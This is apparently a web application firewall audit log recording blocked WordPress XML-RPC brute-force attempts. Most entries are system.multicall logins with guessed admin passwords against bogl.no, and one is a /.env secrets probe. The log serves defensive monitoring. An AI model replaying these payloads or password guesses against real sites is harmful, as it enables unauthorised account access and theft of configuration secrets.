[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104238468098 5851 (- - -) Stopwatch2: 1749104238468098 5851; combined=4188, p1=542, p2=3471, p3=0, p4=0, p5=103, sr=103, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed414654-Z-- --303c827c-A-- [05/Jun/2025:13:17:48 +0700] aEE2jH-K7ToMdu-YSIIkqwAAABA 103.236.140.4 37418 103.236.140.4 8181 --303c827c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --303c827c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin$$ --303c827c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --303c827c-E-- --303c827c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104268883894 5880 (- - -) Stopwatch2: 1749104268883894 5880; combined=4135, p1=525, p2=3432, p3=0, p4=0, p5=105, sr=92, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303c827c-Z-- --ad6df302-A-- [05/Jun/2025:13:22:15 +0700] aEE3lyrHpfaS2Cuwh8XUuQAAAFE 103.236.140.4 37524 103.236.140.4 8181 --ad6df302-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ad6df302-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin25 --ad6df302-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad6df302-E-- --ad6df302-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104535345397 5739 (- - -) Stopwatch2: 1749104535345397 5739; combined=4313, p1=507, p2=3635, p3=0, p4=0, p5=101, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6df302-Z-- --4db46a15-A-- [05/Jun/2025:13:24:27 +0700] aEE4G3-K7ToMdu-YSIIktgAAAAI 103.236.140.4 37560 103.236.140.4 8181 --4db46a15-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4db46a15-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin.2020 --4db46a15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db46a15-E-- --4db46a15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104667067183 5531 (- - -) Stopwatch2: 1749104667067183 5531; combined=3966, p1=451, p2=3292, p3=0, p4=0, p5=142, sr=90, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db46a15-Z-- --2303a653-A-- [05/Jun/2025:13:25:58 +0700] aEE4duth7G2xELALzPYjSAAAAMk 103.236.140.4 37600 103.236.140.4 8181 --2303a653-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2303a653-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh1111 --2303a653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2303a653-E-- --2303a653-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104758327865 5044 (- - -) Stopwatch2: 1749104758327865 5044; combined=3793, p1=464, p2=3164, p3=0, p4=0, p5=96, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2303a653-Z-- --abc9ed37-A-- [05/Jun/2025:13:26:13 +0700] aEE4hOth7G2xELALzPYjSwAAAMo 103.236.140.4 37610 103.236.140.4 8181 --abc9ed37-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --abc9ed37-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh1111 --abc9ed37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc9ed37-E-- --abc9ed37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104772999131 4904 (- - -) Stopwatch2: 1749104772999131 4904; combined=3630, p1=438, p2=3031, p3=0, p4=0, p5=95, sr=80, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc9ed37-Z-- --303fb343-A-- [05/Jun/2025:13:27:17 +0700] aEE4xSrHpfaS2Cuwh8XUzwAAAFg 103.236.140.4 37662 103.236.140.4 8181 --303fb343-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --303fb343-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh92 --303fb343-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --303fb343-E-- --303fb343-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104837919743 4713 (- - -) Stopwatch2: 1749104837919743 4713; combined=3577, p1=396, p2=3014, p3=0, p4=0, p5=97, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303fb343-Z-- --694c1004-A-- [05/Jun/2025:13:29:47 +0700] aEE5WyrHpfaS2Cuwh8XU3QAAAFc 103.236.140.4 37736 103.236.140.4 8181 --694c1004-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 95.217.221.92 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.2535.87 Accept: */* Cookie: X-Forwarded-For: 95.217.221.92 Accept-Encoding: gzip X-Varnish: 173867889 --694c1004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --694c1004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749104987565908 591 (- - -) Stopwatch2: 1749104987565908 591; combined=267, p1=230, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --694c1004-Z-- --738e7759-A-- [05/Jun/2025:13:31:29 +0700] aEE5wVwdJdhOudw5hdzPkQAAAIU 103.236.140.4 37804 103.236.140.4 8181 --738e7759-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --738e7759-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1985 --738e7759-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --738e7759-E-- --738e7759-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105089149409 5821 (- - -) Stopwatch2: 1749105089149409 5821; combined=4120, p1=494, p2=3453, p3=0, p4=0, p5=102, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --738e7759-Z-- --88ebff30-A-- [05/Jun/2025:13:32:45 +0700] aEE6DX-K7ToMdu-YSIIk0QAAABQ 103.236.140.4 37834 103.236.140.4 8181 --88ebff30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --88ebff30-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin07 --88ebff30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88ebff30-E-- --88ebff30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105165405535 6053 (- - -) Stopwatch2: 1749105165405535 6053; combined=4081, p1=492, p2=3412, p3=0, p4=0, p5=106, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88ebff30-Z-- --6a121b5c-A-- [05/Jun/2025:13:35:04 +0700] aEE6mCrHpfaS2Cuwh8XU7wAAAFQ 103.236.140.4 37886 103.236.140.4 8181 --6a121b5c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6a121b5c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@1 --6a121b5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a121b5c-E-- --6a121b5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105304584749 5942 (- - -) Stopwatch2: 1749105304584749 5942; combined=4263, p1=533, p2=3427, p3=0, p4=0, p5=197, sr=98, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a121b5c-Z-- --485d0a13-A-- [05/Jun/2025:13:36:58 +0700] aEE7CirHpfaS2Cuwh8XU-QAAAEk 103.236.140.4 37972 103.236.140.4 8181 --485d0a13-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --485d0a13-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh98 --485d0a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --485d0a13-E-- --485d0a13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105418987496 5008 (- - -) Stopwatch2: 1749105418987496 5008; combined=3412, p1=432, p2=2824, p3=0, p4=0, p5=92, sr=87, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --485d0a13-Z-- --0c7dfc24-A-- [05/Jun/2025:13:36:59 +0700] aEE7CyrHpfaS2Cuwh8XU-gAAAEo 103.236.140.4 37974 103.236.140.4 8181 --0c7dfc24-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0c7dfc24-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin65 --0c7dfc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7dfc24-E-- --0c7dfc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105419652252 4872 (- - -) Stopwatch2: 1749105419652252 4872; combined=3668, p1=410, p2=3090, p3=0, p4=0, p5=98, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7dfc24-Z-- --4e9add1a-A-- [05/Jun/2025:13:38:24 +0700] aEE7YCrHpfaS2Cuwh8XVCgAAAEY 103.236.140.4 38026 103.236.140.4 8181 --4e9add1a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4e9add1a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh45 --4e9add1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e9add1a-E-- --4e9add1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105504662166 4993 (- - -) Stopwatch2: 1749105504662166 4993; combined=3758, p1=427, p2=3162, p3=0, p4=0, p5=99, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e9add1a-Z-- --6eeda57e-A-- [05/Jun/2025:13:43:34 +0700] aEE8lirHpfaS2Cuwh8XVHwAAAEU 103.236.140.4 38174 103.236.140.4 8181 --6eeda57e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6eeda57e-C-- system.multicallmethodNamewp.getUsersBlogsparamsandre1234567890 --6eeda57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6eeda57e-E-- --6eeda57e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105814258222 5766 (- - -) Stopwatch2: 1749105814258222 5766; combined=4075, p1=513, p2=3395, p3=0, p4=0, p5=99, sr=101, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6eeda57e-Z-- --5ea1fa20-A-- [05/Jun/2025:13:44:02 +0700] aEE8sirHpfaS2Cuwh8XVJQAAAEw 103.236.140.4 38190 103.236.140.4 8181 --5ea1fa20-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5ea1fa20-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin123456a@ --5ea1fa20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ea1fa20-E-- --5ea1fa20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105842715555 5430 (- - -) Stopwatch2: 1749105842715555 5430; combined=4024, p1=491, p2=3358, p3=0, p4=0, p5=103, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ea1fa20-Z-- --b278565d-A-- [05/Jun/2025:13:45:30 +0700] aEE9Cn-K7ToMdu-YSIIk-wAAAAE 103.236.140.4 38224 103.236.140.4 8181 --b278565d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b278565d-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminTest123 --b278565d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b278565d-E-- --b278565d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
